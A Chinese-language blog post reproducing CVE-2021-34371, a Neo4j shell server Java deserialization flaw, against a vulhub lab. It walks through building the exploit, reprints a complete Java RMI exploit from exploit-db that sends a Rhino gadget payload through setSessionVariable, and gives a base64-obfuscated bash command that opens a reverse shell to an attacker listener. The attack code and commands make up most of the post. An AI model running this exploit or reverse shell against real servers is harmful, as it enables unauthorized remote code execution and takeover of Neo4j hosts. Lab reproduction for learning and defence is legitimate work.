首页 > 系统相关 >CVE-2021-34371 Neo4j-Shell 漏洞复现

CVE-2021-34371 Neo4j-Shell 漏洞复现

时间:2024-04-23 21:56:43浏览次数:49  
标签:shell String server exploit Shell 2021 Neo4j payload

前言

偶然的一次机会遇到了这个漏洞,决定在vulhub复现下,
重要提醒:本次复现所需要的环境为java8
kali更换java环境戳这里

漏洞描述

Neo4j 到 3.4.18(启用 shell 服务器)公开了一个 RMI 服务,该服务可以任意反序列化 Java 对象,例如通过 setSessionVariable。攻击者可滥用此漏洞进行远程代码执行,因为存在可利用的小工具链的依赖关系

影响版本

Neo4j <= 3.4.18

环境搭建

使用vulhub集成环境搭建,切换到对应目录下起docker即可
详情移步:Neo4j-shell
搭建成功后会在本地的7474端口提供neo4j browser服务
image
至此环境搭建完成

漏洞复现

虽然会在7474端口提供nosql管理服务,但是此漏洞是利用反序列化攻击的是位于1377端口上开放的neo4j-shell服务

切换到/CVE-2021-34371/rhino_gadget目录下
image
执行mvn install
将当前目录下的文件生成位jar包也就是本次的exp
image
这里贴出来另一个exp方便师傅们理解
https://www.exploit-db.com/exploits/50170

# Exploit Title: Neo4j 3.4.18 - RMI based Remote Code Execution (RCE)
# Date: 7/30/21
# Exploit Author: Christopher Ellis, Nick Gonella, Workday Inc.
# Vendor Homepage: neo4j.com
# Software Link: https://neo4j.com/download-thanks/?edition=community&release=3.4.18&flavour=unix
# Version: 3.4.18
# Tested on: Windows, Mac

In older versions of Neo4j, when the shell server is enabled, RCE can be obtained via a Java deserialization exploit. In the ShellServer interface, a method setSessionVariable(Serializable paramSerializable, String paramString, Object paramObject) exists. Neo4j also has a dependency (rhino 1.7.9) with known RCE gadget chains. By crafting an object to abuse these gadget chains, one obtain RCE via the shell server.

To create this from scratch using Java, you’ll need to modify the ysoserial library to include the payload found here https://github.com/mozilla/rhino/issues/520 (an update of the existing rhino gadget) as well as modify the ysoserial POM file to include the correct version of rhino. Rebuild ysoserial and include it on your exploit’s classpath. From there, you can use the ShellServer interface and associated code found in neo4j-shell-3.4.18.jar to make your client aware of the server’s method stubs. Now you should be able to call the setSessionVariable method from your exploit/client via RMI.
In your exploit, use ysoserial to generate a payload as follows: Object payload = new RhinoGadget().getObject(COMMAND), and then call the setSessionVariable with the payload in the paramObject parameter. The other two parameters can be anything. This will cause the server to deserialize your payload, triggering the gadget chain, and running your command.
It is worth noting that we chose to exploit this method and the paramObject parameter as this was the most direct, any method that takes in an Object (other than String or a primitave) is likely vulnerable as well.

package runnable;

import payloads.RhinoGadget;
import sun.rmi.registry.RegistryImpl_Stub;

import java.io.Serializable;
import java.rmi.Naming;
import org.neo4j.shell.ShellServer;

public class ExploitB {

    public static String COMMAND = "touch /tmp/test.txt";
    public static String TARGET = "rmi://127.0.0.1:1337";
    public static String TARGET_BINDING = "shell";

    public static void main (String args[]) throws Exception {

        boolean validBinding = checkBinding(TARGET_BINDING, TARGET);
        if (!validBinding)
        {
            System.out.println("[-] No valid binding found, shell server may not be listening. Exiting");
            System.exit(0);
        }

        System.out.println("[+] Found valid binding, proceeding to exploit");
        ShellServer server = (ShellServer) Naming.lookup(TARGET + "/" + TARGET_BINDING);

        Object payload = new RhinoGadget().getObject(COMMAND);

        //Here server.shutdown may also be callable without auth, just in case the exploit fails and you just want to turn the thing off
        try {
            server.setSessionVariable(newClientId(), "anything_here", payload);
        }
        catch (Exception UnmarshalException ) {
            System.out.println("[+] Caught an unmarshalled exception, this is expected.");
        }
        System.out.println("[+] Exploit completed");

    }

    /**
     * Just a helper method to validate that the rmi binding we're looking for is present
     * @param bindingToCheck the binding you'd like to check for
     * @param targetToCheck the rmi registry to check against
     * @return true if the binding is present, false if not
     */
    public static boolean checkBinding(String bindingToCheck, String targetToCheck) {

        System.out.println("Trying to enumerate server bindings: ");
        try {
            RegistryImpl_Stub stub = (RegistryImpl_Stub) Naming.lookup(targetToCheck);

            for (String element : stub.list()) {
                System.out.println("Found binding: " + element);
                if (element.equalsIgnoreCase(bindingToCheck))
                    return true;
            }
            return  false;
        }
        catch (Exception ex)
        {
            return false;
        }

    }

    public static Serializable newClientId() {
        return Integer.valueOf(1);
    }

}

之后就可以对靶机进行攻击了
将docker的shell反弹到虚拟机
image
bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEzMS4xMjgvOTk5OSAwPiYx}|{base64,-d}|{bash,-i}
开启监听
image
执行命令
image
接收shell
image
复现成功

鸣谢

CVE-2021-34371 Neo4j Shell Server 反序列化漏洞复现
春秋云镜-Time-Writeup

标签:shell,String,server,exploit,Shell,2021,Neo4j,payload
From: https://www.cnblogs.com/Kawakaze777/p/18153842

相关文章

  • Shell阶段01 shell脚本概述, 脚本规范, shell执行方式, shell变量
    Shell什么是ShellShell就是一个命令解释器。Shell分为交互式shell和非交互式shell。交互式Shell就是命令行上面一条一条命令的执行非交互式Shell就是以脚本的方式运行。通过变量$-来查看是否是交互式或者非交互式Shell交互式和非交互式的区别[root@shell01~]#echo......
  • ubuntu连接Xshell
    要想让Xshell连接ubuntu,首先需要让Ubuntu的IP地址固定下来,要不然每次链接都得重新设置主机ip进入ubuntu,打开终端,输入ifconfig查看inet的地址,与虚拟网络编辑器里的VMnet8的子网地址前三位与虚拟机里面的要一致,不一致的化可以点击下方的还原默认设置进行操作2.这些......
  • LLM开源小工具(基于代码库快速学习/纯shell调用LLM灵活管理系统)
    随着AI的各种信息的发展,LLM各种模型不断涌现,作为一名IT人员不得不向前走,不断探索学习发现新知识。随着学习,也了解到一些对于模型的调用,从而解决一些问题,或者对已有工具或应用的重写。如下是两个小工具介绍:QA-Pilot 是一个基于github开放的代码库进行对话式学习使用的工具(目前......
  • shell脚本正则表达式
    声明:以下内容为个人笔记,内容不完全正确,请谨慎参考。正则表达式含义:正则表达式使用的每个单独字符串来描述、匹配一些列符合语法规则的字符串。在很多文本编辑器里,正则表达式通常被用来检索、替换那些符合某个模式的文本。在Linux中,grep,sed,awk等文本处理工具都支持正则表达式......
  • linux shell 编程学习总结
    1文件和数组1.1读文件并将文件内容保存到数组,遍历数组src.f文件内容./src/xxx_1.md./src/xxx_2.md./src/xxx_3.md./src/xxx_4.md./src/xxx_5.mdrun.sh#!/bin/bash###readflisttoarraysrc_array=()whilereadline;dosrc_array+=("$line")done<$1##......
  • 在Linux中,什么是Linux shell?
    在Linux中,Shell是一个命令行解释器,它为用户提供了一个与操作系统交互的文本界面。用户可以通过Shell输入命令,Shell会解释这些命令并将其转换为操作系统能够理解的信号或进程,从而执行相应的操作。1.主要特点命令解释器:Shell读取用户输入的命令,将其转换为操作系统能够执行......
  • 新手大白话 [SWPUCTF 2021 新生赛]babyunser phar反序列化
    进入赛题网站第一眼以为是文件上传,尝试没效果,看题目标签为phar反序列化,这类也就是文件包含php伪协议的一种,实质上就是上传phar文件,利用网页给予的文件读取页面利用phar伪协议进行读取来触发一句话木马,好现在开始做题。(一点也不新生)利用查看文件来收集信息,查看read.php点击查看......
  • shell脚本while循环、read读取控制台输入与函数
    while循环while循环结构while[条件判断]do程序done脚本示例:点击查看代码#!/bin/bashwhile[$a-le$1]do sum=$[$sum+$a]doneecho$sum简易写法:点击查看代码#!/bin/basha=1while[$a-le$1]do letsum+=a leta++doneecho$sumread读取......
  • 【CSP】202109-4 收集卡牌
    题目大意:小明抽卡,卡池共有n张卡,每张抽到的概率为pi,且每张重复的卡可以兑换成硬币,k个硬币可以兑换任意一张卡(硬币会攒起来在恰好可以兑换所有n张卡的时候一次性兑换)。问小明得到n张卡的期望抽卡次数是多少。(n<=16)分析:氪佬小明一看到n<=16就知道要状压dp,思路就是存储每一个状态......
  • linux4-vim与shell脚本
    1.vim+文件名编辑文件a、i、o进入输入模式,esc退出输入模式; :w保存:q退出:q!强制退出2.vim/etc/hostname修改主机名3./etc/sysconfig/network-scripts此目录中修改网卡信息1TYPE=Ethernet//设备类型2BOOTPROTO=static//ip分配模式3......